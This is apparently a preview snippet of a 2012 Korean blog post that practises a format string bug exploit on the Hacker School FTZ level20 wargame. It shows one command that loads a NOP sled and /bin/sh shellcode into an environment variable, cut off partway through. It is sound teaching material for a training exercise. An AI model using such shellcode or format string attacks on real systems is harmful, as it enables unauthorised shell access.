System/Linux17 포맷 스트링 버그 - FSB (Format String Bug) 기본 연습하기 포맷 스트링 버그 해커 스쿨의 ftz level20 포맷 스트링 버그 문제를 풀면서 연습을 해보겠습니다. 먼저 포맷 스트링 버그의 원리에 대해서는 아래 블로그를 참고하세요. http://geundi.tistory.com/133 그럼 ftz의 level20문제를 풀어보겠습니다. 일단 문제를 출력해보면 printf에서 포맷 스트링 버그가 있다는 것을 알 수 있습니다. 그럼 포맷 스트링 공격을 시도해봅시다. 1. 먼저 shellcode를 환경 변수에 넣어 줍니다. export CODE=`perl -e 'print "\x90"x100, "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x.. 2012. 5. 2. 이전 1 2 3 4 5 다음
